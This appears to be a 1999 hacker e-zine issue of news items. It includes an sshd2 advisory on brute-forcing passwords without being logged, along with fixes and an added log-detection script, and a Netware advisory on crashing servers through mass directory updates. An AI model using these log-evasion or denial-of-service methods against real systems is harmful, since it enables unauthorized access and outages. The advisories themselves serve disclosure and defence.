Hackers Zone competition, which started Wednesday, is offering $10,000 to the first person to successfully break into servers connected to the Web and running
security products. One server is running security products from Voltaire Advanced Data Security, while the second server is running software from Conclave Integrated
Security.

The contest, hosted by Infosecurity Asia '99, the computer-security conference that will be held in Singapore next month, is open to anyone in the
world. In order to prove success, hackers have to move a file onto the server, or modify the Web page hosted there, and then send an e-mail
describing their action to an address set up at Yahoo. The conference has promised to keep the names of all contestants confidential.

The sponsors of the contest sought to point out that they did not endorse hacking, the general term for breaking into computer networks. Some computer enthusiasts
prefer the term "cracker," using the term hacker instead to refer to any hard-core programmer.

"We consider hacking a criminal offense prosecutable in many countries and we do not condone such actions," said George Kane, regional director of Conclave, in a
statement.

Dan Farmer, a well-known computer-security expert, said such contests are not what they're cracked up to be.

"Organizations do this from time to time -- it's not unusual," Farmer said. "I view them as misguided and modestly dangerous publicity stunts."

There are a number of problems with such contests, he said. For one thing, the computer set-ups rarely mimic the way a network would be forced to work in the real
world. Thus, he said, some companies use such contests to tout the invincibility of their systems and say how they foiled the world's best crackers, even though the
world's best hackers probably would not get involved in something like this.

Companies also get free testing of their systems. For instance, they can get "attack signatures," digital fingerprints that show how people attack a certain system. These
can be used later to help companies realize when they are being attacked in the future. Such signatures are hard to get in the real world. Furthermore, such security
testing can be quite expensive.

"10K is chump change in the corporate world," Farmer said.

Farmer is the author of Security Administrator's Tool for Analyzing Networks, a Unix tool that systems administrators use to test for security breaches in networks. The
program, known as SATAN, caused a stir when it came out in 1995, prompting Farmer to publish multiple documents through his website explaining the rationale behind
the software. The difference, Farmer said, is that contests encourage a certain type of behavior.

"They're sending a message that breaking into systems is OK, that they'll reward the best and brightest," Farmer said.

@HWA


42.0 SSHD vulnerability discovered by JJF Hackers Team
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

SSH Hole


contributed by Zhodiac
The J.J.F. Hackers team has released an advisory that
covers problems in SSHD2 (up to version 2.0.11). The
vulnerability describes a way to brute force a
login/password.

J.J.F. Hackers Team
http://www.jjf.org/advisory/SshdJJFen.txt



- J.J.F. / Hackers Team - Security Advisory
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Date: 05/09/1999
Release: 05/14/1999
Author: Zhodiac <zhodiac@jjf.org>
URL: http://www.jjf.org
Application: sshd2 up to 2.0.11
OS: Unix
Risk: Risky :), long term could gain system access.

-=-=-=-=-=-=-=-=
Introduction
-=-=-=-=-=-=-=-=

In the default installation of sshd2 (up to 2.0.11) there is an
open way to bruteforce a login/password, without any kind of ip logging
by the sshd. Version 2.0.12 and newer seem not to be vulnerable to
this attack, because they log the ip at connection time.

-=-=-=-=-=-=-=-=
Details
-=-=-=-=-=-=-=-=

When an ssh client connects to the daemon, it has a number
(default is three) of attempts to guess the correct password before
being disconnected. If we shut down the connection before using up the number
of attempts, the daemon will log neither the connection, the
password guesses, nor the ip of the client.

One crystal clear example:

[zhodiac@piscis zhodiac]$ ssh -l zhodiac piscis
zhodiac's password:
zhodiac's password:
zhodiac's password:

Disconnected; authentication error.
[zhodiac@piscis zhodiac]$

In /var/log/messages:

May 9 12:42:53 piscis sshd2[1391]: User authentication failed:
'Authentication method disabled. (user 'zhodiac', client address
'192.168.1.1:1344', requested service 'ssh-connection')'

Now we try the bug:

[zhodiac@piscis zhodiac]$ ssh -l zhodiac piscis
zhodiac's password:
zhodiac's password:
zhodiac's password: FATAL: Received signal 2.
[zhodiac@piscis zhodiac]$ ssh -l zhodiac piscis
zhodiac's password:
zhodiac's password:
zhodiac's password: FATAL: Received signal 2.
[zhodiac@piscis zhodiac]$ ssh -l zhodiac piscis
zhodiac's password:
zhodiac's password:
zhodiac's password: FATAL: Received signal 2.
[zhodiac@piscis zhodiac]$

Those "FATAL: Received signal 2." lines are the result of
interrupting the program with a ^C.

Let's see what syslog did:

May 9 12:44:41 piscis sshd2[1403]: Remote host disconnected: Connection closed.
May 9 12:44:44 piscis sshd2[1405]: Remote host disconnected: Connection closed.
May 9 12:44:47 piscis sshd2[1407]: Remote host disconnected: Connection closed.

No IP, no password-guess attempts in the logs!
So a brute force can be done without any kind of logging... Sorry
script-kiddies, no program available!

-=-=-=-=-=-=-=-=
Quick Fix
-=-=-=-=-=-=-=-=

Edit the file sshd2_config (usually in /etc/ssh2) and set the value
of "PasswordGuesses" to 1. With this, every password attempt is
logged in the following way:

May 9 12:46:07 piscis sshd[1308]: User authentication failed:
'Authentication method disabled. (user 'zhodiac', client address
'192.168.1.1:1527', requested service 'ssh-connection')'

It is also recommended to set the value of "ListenAddress", so that we
have more control over which IPs can use our ssh service.

A better solution is to upgrade to version 2.0.12 or newer; those
versions log each connection via syslog in the following way:

May 9 15:23:33 piscis sshd2[7184]: connection from "192.168.1.1"

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
zhodiac@jjf.org

http://www.jjf.org
- J.J.F. / Hackers Team - Security Advisory
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
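
As an added example from the defender's side (not part of the J.J.F. advisory), the following Python
script reads sshd2 syslog lines in the formats shown above, flags sessions that ended with "Remote host
disconnected" without ever logging a client address, and counts how many of those fall inside a short
window. The sample log lines, the 60-second window and the threshold of three are constructed
assumptions modeled on the advisory's example.

```python
"""Added example, not part of the J.J.F. advisory: detect the sshd2 logging gap
it describes.  A client that drops the connection before exhausting
PasswordGuesses leaves only "Remote host disconnected: Connection closed." in
syslog, with no client address and no "User authentication failed" record.
This script finds such address-less sessions and flags bursts of them.
"""
import re
from datetime import datetime

# Constructed sample log, modeled on the /var/log/messages excerpts in the
# advisory (sshd2 up to 2.0.11, plus one 2.0.12-style "connection from" line).
SAMPLE_LOG = """\
May  9 12:42:53 piscis sshd2[1391]: User authentication failed: 'Authentication method disabled. (user 'zhodiac', client address '192.168.1.1:1344', requested service 'ssh-connection')'
May  9 12:44:41 piscis sshd2[1403]: Remote host disconnected: Connection closed.
May  9 12:44:44 piscis sshd2[1405]: Remote host disconnected: Connection closed.
May  9 12:44:47 piscis sshd2[1407]: Remote host disconnected: Connection closed.
May  9 15:23:33 piscis sshd2[7184]: connection from "192.168.1.1"
May  9 15:23:40 piscis sshd2[7184]: Remote host disconnected: Connection closed.
"""

# Syslog line: "<Mon> <day> <HH:MM:SS> <host> sshd2[<pid>]: <message>"
LINE_RE = re.compile(
    r"^(?P<mon>[A-Z][a-z]{2})\s+(?P<day>\d{1,2}) (?P<time>\d\d:\d\d:\d\d) "
    r"(?P<host>\S+) (?P<prog>sshd2?)\[(?P<pid>\d+)\]: (?P<msg>.*)$"
)
# The two records that carry a client address: the auth-failure record
# (all versions) and the "connection from" record (2.0.12 and newer).
ADDR_RE = re.compile(
    r"client address '(?P<auth>[\d.]+):\d+'|connection from \"(?P<conn>[\d.]+)\""
)


def parse_line(line):
    """Return {'ts', 'pid', 'msg'} for an sshd/sshd2 syslog line, else None."""
    m = LINE_RE.match(line)
    if not m:
        return None
    # Syslog carries no year; year 1900 is fine for computing time differences.
    ts = datetime.strptime(f"{m['mon']} {m['day']} {m['time']}", "%b %d %H:%M:%S")
    return {"ts": ts, "pid": int(m["pid"]), "msg": m["msg"]}


def client_address(msg):
    """Extract the client IP from a message, or None if it carries none."""
    m = ADDR_RE.search(msg)
    if not m:
        return None
    return m["auth"] or m["conn"]


def blind_disconnects(log_text):
    """Return sorted [(ts, pid)] for sessions that ended with 'Remote host
    disconnected' and never logged a client address.  Sessions are keyed by
    PID; on a long log, PID reuse would need the timestamp in the key too."""
    sessions = {}  # pid -> {"addr": str or None, "disconnect": datetime or None}
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        s = sessions.setdefault(rec["pid"], {"addr": None, "disconnect": None})
        addr = client_address(rec["msg"])
        if addr:
            s["addr"] = addr
        if rec["msg"].startswith("Remote host disconnected"):
            s["disconnect"] = rec["ts"]
    return sorted(
        (s["disconnect"], pid)
        for pid, s in sessions.items()
        if s["disconnect"] is not None and s["addr"] is None
    )


def max_burst(events, window_seconds=60):
    """Largest number of events inside any sliding window of window_seconds."""
    times = sorted(ts for ts, _ in events)
    best, start = 0, 0
    for end, t in enumerate(times):
        while (t - times[start]).total_seconds() > window_seconds:
            start += 1
        best = max(best, end - start + 1)
    return best


def analyze(log_text, window_seconds=60, threshold=3):
    """Summarize address-less disconnects; 'alert' is True when `threshold` or
    more of them fall inside one window, the shape of the guessing shown in
    the advisory (three guesses, ^C, reconnect, repeat)."""
    blind = blind_disconnects(log_text)
    burst = max_burst(blind, window_seconds)
    return {"blind": blind, "max_burst": burst, "alert": burst >= threshold}


if __name__ == "__main__":
    result = analyze(SAMPLE_LOG)
    for ts, pid in result["blind"]:
        print(f"{ts:%b %d %H:%M:%S} sshd2[{pid}]: disconnect with no client address")
    print(f"max burst in 60s: {result['max_burst']}, alert: {result['alert']}")
```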

@HWA

43.0 Neil Stephenson's new book "Cryptonomicon"
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


‘Cryptonomicon’: Turning point for cult author
Neal Stephenson embarks on multi-novel epic journey
By Alan Boyle
MSNBC

May 12 - The Hacker Hemingway looks the part: In his publicity photo, he strikes a cross-armed
pose in goatee, close-cropped hair and shades. But Cryptonomicon author Neal Stephenson, a
family man pushing 40 as well as a leading light in cyberpunk lit, jokes that his image could use an
overhaul. "I may have to lose the goatee," he says.

ALONG WITH the comparisons to Ernest Hemingway and Thomas Pynchon, Stephenson has won praise for his
fanciful visions of not-all-that-distant technological futures. In his 1992 novel Snow Crash, he depicted a
virtual-reality realm called the Metaverse, which seemed to presage the rise of Internet culture. In 1995,
Diamond Age blended neo-tribalism with nanotechnology and an almost Big Brotherly global communications network.
All this has brought Stephenson a loyal following among computer adepts and led Newsweek to use the "Hacker
Hemingway" tag. His book is on Amazon.com’s top-10 list. But during a book-tour interview, Stephenson confessed that
he was sometimes uncomfortable with his hacker-cult status.

"I find that the standard attitude of young people now, people in high school, in college, in their 20s,
is this image of hip, jaded, ultracool detachment," he said. "I’ve noticed that there are a fair number of people
like that who assume I’m one of them. I’m actually not. I actually find people like that kind of annoying."

PAST AND PRESENT

Cryptonomicon may mark a turning point for Stephenson. "One of the things I developed a reputation for with the
other books was speculating about future technologies, good or bad," he acknowledged. "And readers who come to
‘Cryptonomicon’ looking for that kind of thing aren’t going to get it."

Unlike the futuristic Snow Crash or Diamond Age, Stephenson’s latest work focuses on the past and a plausible
present: the battles over secret codes in World War II, modern-day deals to create data havens and, of course,
heroes who uncover a dark conspiracy that bridges the decades. It’s a cross between Raiders of the Lost Ark and
The X-Files, weighing in at 918 pages. The length isn’t the only thing imposing about Cryptonomicon: The book’s huge
cast includes historical figures such as code-breaking mathematician Alan Turing and Army Lt. Ronald Reagan. Characters
expound upon the intricacies of high-tech business plans and Cap’n Crunch cereal.

But most of all, the novel revolves around cryptography: keeping secrets and unlocking them. In fact,
Cryptonomicon boasts a how-to appendix that, by some accounts, would violate encryption export laws if it were
transmitted abroad electronically.

The appendix on the Solitaire encryption algorithm, which uses a deck of cards rather than a computer to encode
secret messages, was written by Bruce Schneier, author of Applied Cryptography. Stephenson himself is well-versed
in the mysteries of software code but doesn’t profess to be a crypto expert.

"I tried to keep it real as much as I could," Stephenson said. "There are places where the book deviates somewhat
from complete technical accuracy. I actually posted a little FAQ document specifically aimed at people who know about
crypto, because I know people who know crypto are going to see some things that I glossed over."

DEALING WITH CELEBRITY

Over the years, Stephenson has dealt with more than one bout with cyber-lebrity, and he says his experience is
serving him in good stead this time around. He’s avoiding broadcast interviews on this tour, since he says "all of my
most horrifying experiences on the last tour were trying to explain my book on television."

He also manages to keep his public life separate from his private life. He quickly declines to discuss the effect
of cyclical fame on his family in Seattle, and he’s reluctant to talk about the grander meanings behind his writing.

"If I try to stand outside of it and encapsulate my own themes, it would ruin it for me because I would be way too
self-conscious, and it would ruin it for readers, too," he said.

All in all, he sounds as if he’s anxious for the book tour’s end, so he can get back to work.

"I have to have a lot of privacy, a lot of quiet, a minimum of distractions to do what I do," he said. "When it’s over,
it’s really over. As soon as I finish this thing, I go into a total media blackout for years."

As fat as Cryptonomicon is, Stephenson still had to leave out some of the plot threads he was hoping to follow
and he says those tales will be told in his next novel, a sequel of sorts.

"The funny thing about writing books is that the stuff that’s out where people can see it is a year or two behind the
stuff that you’re doing at the moment," he said. "And if things are going right, the stuff you’re doing at the moment seems a
lot better. That’s one of the ways of trying to avoid getting a swelled head."

@HWA

44.0 Novell Netware 4.0 advisory by Nomad Mobile Research Center
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

Novell Netware 4.x Vulnerable


contributed by Simple Nomad
The Nomad Mobile Research Center has released an advisory that says that under certain conditions,
Novell Netware 4.x is vulnerable to a denial of service that can crash multiple servers. According
to Novell, the latest Service Pack will correct the problem.

The Nomad Mobile Research Center
http://www.nmrc.org/news/tts.txt

_______________________________________________________________________________

Nomad Mobile Research Centre
A D V I S O R Y
www.nmrc.org
Simple Nomad [thegnome@nmrc.org]
12May1998
_______________________________________________________________________________

Platform : Netware 4.x
Application : NDS
Severity : High


Synopsis
--------

It is possible to overflow the Transaction Tracking System (TTS) built into
Novell Netware and possibly crash multiple servers.

Tested configuration
--------------------

The testing was done with the following configuration:

Netware 4.11, Service Pack 5B

Also confirmed on Netware 4.1. All systems had 64MB RAM and 1 GB drive space.

Bug(s) report
-------------

The Transaction Tracking System (TTS) is used by Novell Netware to help
preserve the integrity of data during a system crash. If a transaction is in
the process of being written to the hard drive when the system crashes, upon
reboot the partial transaction is backed out preserving the integrity of the
original data. Administrators can optionally flag a file with the TTS flag
to add this protection (typically done with databases, especially those that
have no rollback features).

TTS by default tracks 10,000 transactions, and each instance uses a small
amount of memory. If a burst of transactions is sent to the server and the
available memory is exhausted, TTS will disable itself. While TTS is disabled, no
updates can be made to Netware Directory Services. This can impact any program
or process that updates NDS, such as login. In extreme overrun cases, such as
very large simultaneous (or near-simultaneous, actually) transactions, memory
will be depleted quickly enough to crash the server.

This is not entirely uncommon, as any large burst of traffic updating NDS
will cause the problem, such as bringing up a server after several days of
downtime that has a Directory Services replica on it. Normally this can be
corrected by increasing RAM or lowering the amount of transactions tracked
from the maximum default of 10,000 down to say 5,000 by issuing the command
SET MAXIMUM TRANSACTIONS = 5000 at the console or via ServMan, and enabling
TTS by typing ENABLE TTS at the console.

However, a malicious user with proper access can force the memory depletion
and potentially crash a server that has a replica of the NDS database. This
can lead to multiple near-simultaneous server crashes.

Of course anyone with administrative access can do this, but they could
obviously do other acts that could be just as destructive, if not more so.
What is needed is the ability to create a large number of NDS updates very
quickly. For example, if a user has the ability to create a container and
add objects to it, then that user has enough authority to potentially cause
problems to TTS. Creating a container, dropping a few hundred objects into the
container via drag-and-drop and then deleting the container should suffice.

If the server lacks a large amount of free memory, the server will quite
possibly abend. In other cases, TTS is disabled, which is a form of Denial of
Service. As the messages are sent across to other servers containing NDS
replicas, they too may crash. In our test environment we were able to crash
two servers (Netware 4.1 and Netware 4.11) with the scenario of creating a
container, adding a few hundred users, and then deleting the container.

Solution/Workaround
-------------------

NMRC has heard reports of as many as a dozen servers crashing within a couple
of minutes of each other, so apply the latest Service Pack for Netware 4.x on
all servers or upgrade to Netware 5.

Comments
--------

Novell has already been notified and they are obviously aware of the TTS
limitations (refer to the May 1997 TID 2908153 at
http://support.novell.com/cgi-bin/search/tidfinder.cgi?2908153 for an example).
Per Novell the latest patches for Netware 4.x correct the problem, and Netware
5 does not have the problem at all.

Thanks to Michel Labelle <divebc@hotmail.com> for notifying NMRC about this
problem.

_______________________________________________________________________________


@HWA




45.0 Penalties for Pirates may increase
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

Penalties for Pirates May Increase


contributed by 1Di3h
A hearing of the House Judiciary Committee heard
testimony from the FBI, the Department of Justice, and
numerous software companies supporting proposed
legislation that would toughen the penalties for makers
and distributors of illegal copies of software.

Wired
http://www.wired.com/news/news/politics/story/19659.html

Stiffer Fines Due for Pirates?
by Heidi Kriz

3:00 a.m. 13.May.99.PDT
One out of four business software applications is pirated.

So testified Tim Starback, director of marketing for digital font maker Emigre, at a Wednesday hearing
of the House Judiciary Committee that addressed digital copyright violations. The company joined other
software publishers, as well as the FBI and the Department of Justice, in supporting proposed legislation
that would toughen the penalties for makers and distributors of illegal copies of software.

"It's time for Congress to make the pirates pay," said Ken Wasch, president of the Software & Information
Industry Association (SIIA).

Wednesday's testimony to the Subcommittee on Courts and Intellectual Property sought to advance two agenda
items.

Industry reps praised proposed amendments to the current Copyright Act, introduced yesterday by
Representative James Rogan (R-California) and Representative Howard Coble (R-North Carolina).

They also sought to hurry along implementation of the Clinton administration's 1997 No Electronic Theft
Act (NET). The latter legislation is managed by a sentencing commission, but no commissioners have been
appointed to staff it.

The proposed amendments, known as the Copyright Damages Improvement Act of 1999, seek to increase fines in
the cases of copyright violations. The current range of statutory damages, which date to 1988, vary from
US$500 to $20,000, according to Dan Duncan, vice president of government affairs for the SIIA.

Tuesday's legislative amendments propose increasing that penalty to between $750 and $30,000 -- a figure
the industry group said is based on actual damages and lost profits. In cases of willful infringement, the
new ceiling of damages would be raised from its current level of $100,000 to $150,000.

Witnesses sought to persuade Congress to clarify sentencing guidelines for criminal copyright infringements
under the NET Act.

Should the legislation pass a subcommittee vote, it will then move on to a vote in the House Judiciary
Committee, and then to a House vote. Duncan said that House members had expressed a desire to vote on the
amendments before the upcoming congressional recess, which starts after Memorial Day.

Not everyone is raving about the proposed stiffer penalties.

An MIT computer-science student who goes by the name Phat Boy said that the fines would punish those who
simply share unlicensed software over the Net as much as those who seek to sell it.

Phat Boy cited the case of "LaMacchia," a fellow MIT student who in 1994 was fingered by authorities for posting
licensed programs on the Net. Under the new rules, he would be fined hundreds of thousands of dollars, according
to Phat Boy.

"Why should that kind of act -- maybe
ill-advised, but certainly perpetrated in
the generous, shareware spirit -- be
punished with the same ferocity as a
corporate pirateer [would be]?" said Phat
Boy.


@HWA

46.0 British Spy's site shutdown on Geocities?
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From http://www.403-security.org/

Spy's site shut down
Astral 13.05.1999 12:00

The free webhosting service GeoCities has shut down a former British spy's site because he was threatening to
publish claims of global illegal acts by British intelligence. The site was taken down at the end of April. What secrets
was he about to reveal? Story from ZDnet.

GeoCities Downs Spy Site

The free webhosting service GeoCities has shut down a former British spy's site. What secrets was he about to
reveal?


How far can the influence of British intelligence reach?

Today it reached half way around the world to shut down a California-based website that allegedly revealed the
identities of Her Majesty's secret agents.

Richard Tomlinson used to be an agent for the British government. Ousted in 1995, Tomlinson was then imprisoned
in 1997 for violating a British official secrets act. After his release, he reportedly ended up in Switzerland,
where he started a website claiming global illegal acts by British intelligence.

The site was taken down at the end of April; Swiss authorities say Tomlinson had threatened to publish British
secrets online, and they had to shut him down to prevent that.

Last week, Tomlinson put up a new site through the free Web-hosting service GeoCities. This time, he allegedly
said he was going to release sensitive details about where British intelligence offices are located. That new
site has now been suspended.

Bruce Zanca, the vice president of communications at GeoCities, says that it was simply a matter of policy.
"People [complete] a questionnaire and agree to no illegal activities and no hate speech. It was brought to our
attention that there were content violations; we put the site under suspension."

He added, "We're careful in protecting privacy for our users, so I can't get into details, but it fell under
the general content restrictions."

Next steps? "[Tomlinson] is free to [dispute the shut down] and if so, we'll start a dialog with him. If the
site is brought into compliance, we'll put the website back up."

Sunday Times (UK)
May 13 1999
BRITAIN

Government fears that rogue website might put lives at risk,
writes Michael Evans

MI6 agent list published on the Internet

URGENT legal moves were ordered yesterday after an
American website published the names of a "large number" of serving MI6 intelligence officers.

Ministry of Defence officials learnt of the new Internet website yesterday morning and immediately
contacted Rear Admiral David Pulvercraft, Secretary of the Defence, Press and Broadcasting Advisory
Committee - the D Notice Committee - to try to prevent publication of any of the names by the British
media.

The list of MI6 names and other details about the intelligence service were regarded as a serious security
breach.

Admiral Pulvercraft, who has no powers to stop newspapers publishing sensitive material, advised that
publication of such details could "put lives at risk". He said that there was concern that the "long list"
may have been put on the Internet by a former member of the Secret Intelligence Service.

Last week the Government took out a court injunction in Switzerland against Richard Tomlinson, the former MI6
officer who was sacked from the service and was subsequently sentenced to 12 months in prison for
breaching the Official Secrets Act.

The injunction prevented Mr Tomlinson, who now lives in Geneva, from disclosing any information about his past
employment by MI6. The injunction covered disclosure anywhere in the world and included information put on the
Internet.

The American website makes no mention of Mr Tomlinson, and there is no evidence that he set it up himself.

However, it was clear to Government lawyers that information on the website had come from Mr Tomlinson.
The website refers to a disaffected MI6 officer.

John Wadham, his lawyer, said that he had threatened to put such information on the Internet.

He said Mr Tomlinson felt he had been "harassed around the world", and this was why he may have decided to take
such action.

Mr Tomlinson has also indicated that he still hoped to publish a book. It was his attempt to sell his MI6 memoirs
to an Australian publisher that led to his arrest and trial at the Old Bailey. He pleaded guilty to breaching the Official
Secrets Act and was released from jail in April last year.

Although the Chief of the Secret Intelligence Service, known as "C", currently Richard Dearlove, is formally
named by the Government on his appointment, no other members of the service are ever officially identified.

Under Defence Advisory Notice No 6, editors of newspapers are asked to seek advice from the D Notice
Secretary before publishing such details "unless they have been widely disclosed or discussed".

Admiral Pulvercraft made clear yesterday that the identities of so many MI6 officers had not been previously disclosed,
and he asked that the address of the website should not be published.

Steps were being taken to see how the damage arising from the disclosure of the MI6 names could be minimised.

Admiral Pulvercraft had to decide whether to make an issue of the case, knowing that by doing so he was drawing
attention to the fact that a website had been set up.

He said yesterday that even if the website was only short-lived, he felt it was necessary to put out an advisory
notice.




@HWA

47.0 The Virus Hype, Fact or Fiction by Thejian
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From http://www.net-security.org/

THE VIRUS HYPE: FACT OR FICTION?
by BHZ, Thursday 13th May 1999 on 9:48 pm CET
Viruses are common threats to all computer users. From exe infectors to new-age
Macro viruses. Our new special report goes deeper into viruses. You can read about
"White Hats" and "Black Hats", media hype, myths and of course solutions. So if
you are interested, read the new Special Report.

The Virus-hype: Fact or fiction?

By now we've probably all heard of the term "computer virus". After all the
panic first caused by Melissa and followed up by the CIH 1.2 Chernobyl-virus
the mainstream computer-users now know (if they didn't know that already)
one of the threats of the "Information Age" by name. It's nice that we all can
copy and download programs and files from the internet and from each others system,
but there are certain safety risks involved here. They have always been there
btw, we just needed a little push to get the media coverage going. But how bad
is it really? Every major online news service (and a lot of their printed
colleagues too) have reported about the menace the computer virus presents and
they did a good job scaring the crap out of the clueless regular computer users,
but how much of these stories is really true? And what is yet to come?

Let's get something straight first: the first goal of most newspapers and online
news services IS profit. They just need to sell. As do the Antivirus developers.
This was demonstrated nicely in December last year, when the Remote Explorer-virus
hit the network of MCI Worldcom. Eventually it was proven to be an attempt for vengeance
by one of the company's ex-employees. But by then the media-machine of AV-developer
Network Associates had sadly labeled this virus, that spread through the Win NT
networks of the company encrypting and resizing data files, as one of the worst
viruses ever. This turned into just another marketing trick, in the hope to
sell their fix which was miraculously discovered only a week after NA and the media
had convinced the public that this was the big one.
It's sad to see how some companies can put their name out to dry just to gain some
more profit, but it's even sadder to see how easily some journalists take over
such a story to sell a few more papers or a little more advertising.

Viruses just scare the crap out of the regular user because he doesn't know much on the
subject.

Let's look at where viruses come from for example. The main opinion on virus-writers
and the virii-scene (VX) is almost one of hate. "Those rotten low-life computer-geeks
who are only out for one thing: complete and utter destruction of ones data!"

This view just shows how misinformed some people are. Of course there are some people
out there who are really devoted to destruction, but they're to be found in every
field. The effect some viruses have combined with the feeling of helplessness the
average Joe feels when infected by one is one of the primary causes of this. The
press can be named as another, but probably one of the biggest enemies here is the
lack of knowledge on the matter. Don't get me wrong, I don't condone virus-writing
in any way, I just don't condemn it either. One huge point is forgotten by people
who discuss this topic like the sky is going to fall down. Computer viruses may cause
damage but they have brought on immense technological development.
I'd rather have some "bad guys" and also a lot of "good guys" who
research and cooperate with each other on this field and in this way help develop
methods to protect my pc than that the scene goes completely underground, leaving the
AV-researchers only with the opportunity to research a virus when it starts spreading.
Think about it. I don't want to come 'round quoting Confucius to y'all, but a doctor
that cures when an illness starts to spread will of course get more fame than one that
prevents the illness at the first signs. But which one would you prefer to be treated by?
The one that lets you get sick first or the one that cures you at the first detection?

The virus writers' community is split (like the general hacking community) into two camps.
They refer to themselves as "Black Hats" and "White Hats". The "Black Hats" are mostly
interested in doing damage and sometimes release viruses through e-mail or Usenet
newsgroups. Though there have been a lot of discussions on this subject, virus
writing (leaving out the macro viruses here) requires a great amount of skill. A lot of
the people who develop and research viruses could be called "hackers" instead of
"vandalists", for what they do is aimed at technological progress and has certainly
not always to do with destruction of data. This is proven by the fact that the majority
of computer viruses never make it "into the wild". They reside only in virus libraries
kept by writers and researchers.

The claim that there are thousands of viruses around nowadays is, when you look at the
above, just not accurate either. People who make these claims almost certainly work for
the AV-companies or simply don't know what they're talking about. AV-companies count even
the most insignificant variations of known viruses as new ones for advertising purposes.
Most viruses are just variations on the same virus, sometimes even only differing one
symbol in its code or message (instead of "legalize" a variation of the good old
Marijuana-virus later contained the word "legalize", is this a new virus???).

In general AV-software is able to detect such variations on its own nowadays and the
few really new ones are quickly added to upgrades which every user can simply download
from the manufacturer's site. Sure, you can never detect all of them in time and
sometimes data is lost, but virus scanners could detect CIH 1.2 even before it struck
on the 26th of April and these technologies are still advancing rapidly.

Another myth is the one that you can only get viruses by downloading from BBS's and
the Internet. In fact, this is one of the least common ways of infection. Most sites
nowadays use strict policies to make sure you won't get infected through anything
you've downloaded there. It can happen sometimes of course, but I've never heard one
of my friends complaining about this. A big chunk of the online infection-problem lies
within e-mail, which spreads mostly macro-viruses.
One of the main sources of viruses nowadays is the demand for more functions in
our software, like the Corel or Microsoft Office scripting languages.
WordBasic is a nice example of this. This microprogramming language which is part of
the Microsoft Office-package allows a user to add new functions (in the form of macros)
to their copies of Word, Access or Excel. Problem is that only a select group of users
knows how to use this. Among them are the macro virus writers. The Melissa-macro virus is
a nice recent example of this. Is it really necessary to have a zillion more functions
if this opens up just as many new manners to attack ones data?
Also, besides downloading and employees holding a grudge, one of the main problems lies
with the retail packages themselves. Besides some bugs and copy-protections gone bad, a
lot of viruses are spread directly from the companies that might seem to be victims. For
example, IBM recently recalled a shipment of Aptivas which were infected with the
CIH-virus.

Due to monopolizing of certain lines of software using the above mentioned scripting-
languages, the problem caused by this spreads. Also with the development of new
functions and technologies within vulnerable packages, even more new sources for virii
come into existence every day. "So the next generation viruses will be even more
destructive?", you might ask. I think the last two months have shown that. First we
had the Melissa-virus. All major companies shut down their networks to keep from being
infected and once again all AV-developers and journalists jumped on the virus-subject.
Only to have the "plague" called Melissa overshadowed by a new one called CIH 1.2 a
couple of weeks later. Where Melissa (and her variations) just caused a lot of extra
email-traffic, CIH 1.2 attacked the (flash) BIOS and the HD's themselves. After his
arrest (and release) the creator of the virus even told the press about two more
destructive viruses he was working on! If you combine this with the Chaos Virus Theory,
which predicts the advancement of future virus generations to intelligent, thinking and
self-evolving viruses, the question arises: how can we ever prevail against these evil
menaces?

At the danger of sounding like I'm downplaying or underestimating the problem, I think
we shouldn't panic too much on the subject though. Like I mentioned before, AV-research
makes a lot of progress. This is mainly because of the cooperation between AV-companies
and the virus-creators. If you start a manhunt on the latter, the first will be left
empty-handed. The only way we will notice the new discoveries in this field then is by
the time they've infected half the Internet. Of course we should be aware of certain
elements in this scene, the ones insisting on inflicting damage and aiming for "Internet-
anarchy". You can't judge a group of people by a (relatively small) segment of that
group. Now the FBI is shutting down virii-sites like Codebreakers. From one
point of view this is necessary and only a logical step, and while I agree that steps
should be taken to prevent the kiddies from downloading virus-sources to impress their
friends and in this way (intended or not) spread another infection, we shouldn't forget
the fact that the only way to keep up and be able to actively and effectively combat
this menace is by working together. We should beware not to force the "underground" to
really go underground. Viruses present a very real threat, but don't get sucked into
the hype. For all our sakes.

Thejian
Help Net Security
http://net-security.org

48.0 The Internet Fraud Council
~~~~~~~~~~~~~~~~~~~~~~~~~~

THE INTERNET FRAUD COUNCIL
by BHZ, Thursday 13th May 1999 on 4:23 pm CET
Computer fraud costs the industry billions of dollars. Finally US authorities created
The Internet Fraud Council, a coalition of a few companies that fight computer crime.
They said that they will give their "Seal of approval" to companies that are fraud-free.
Officials at the electronic crime center also announced yesterday a new FBI Internet
Fraud Complaint Center, which will collect complaints from across the country. Read
the whole article on CNET.

Council formed to fight Net fraud
By Reuters
Special to CNET News.com
May 11, 1999, 8:55 a.m. PT

ORLANDO, Florida--With fraud on the Internet shaping up as the multibillion-dollar crime of the
1990s, U.S. authorities and antifraud groups yesterday launched fresh initiatives to combat Net
crime.

The Internet Fraud Council, a coalition of antifraud companies, said it will create a set of
standards for companies doing business on the Internet, a clearinghouse of information on online
crime, and a fraud-free "seal of approval" for such businesses operating in cyberspace.

"It's hard for law enforcement to keep up," John Hiatt, president of the National Coalition for the
Prevention of Economic Crime, said at a news conference during a meeting on economic crime.

"The bandits change hardware and software every six months. In law enforcement, that number is 48
months,"
he said.

Paul Fichtman, chairman of the Internet Fraud Council, said estimates of the cost of Internet fraud
ranged from $9 billion to $108 Billion in 1998.

"Clearly, there's no way anyone can estimate the amount of fraud on the Internet," he said.

The Internet Fraud Council also said it would create a clearinghouse for information about online fraud.

Most Internet crime involves the theft of identifying information, such as credit card or social security
numbers from individual consumers. But thieves also steal corporate identities, posing as news services or
financial analysts in order to float false reports that can send a stock soaring or plummeting.

In April, an Internet posting of a false financial news story sent shares of PairGain Technologies, a small
California company, soaring 31 percent, only to fall back to earth when the story proved false.

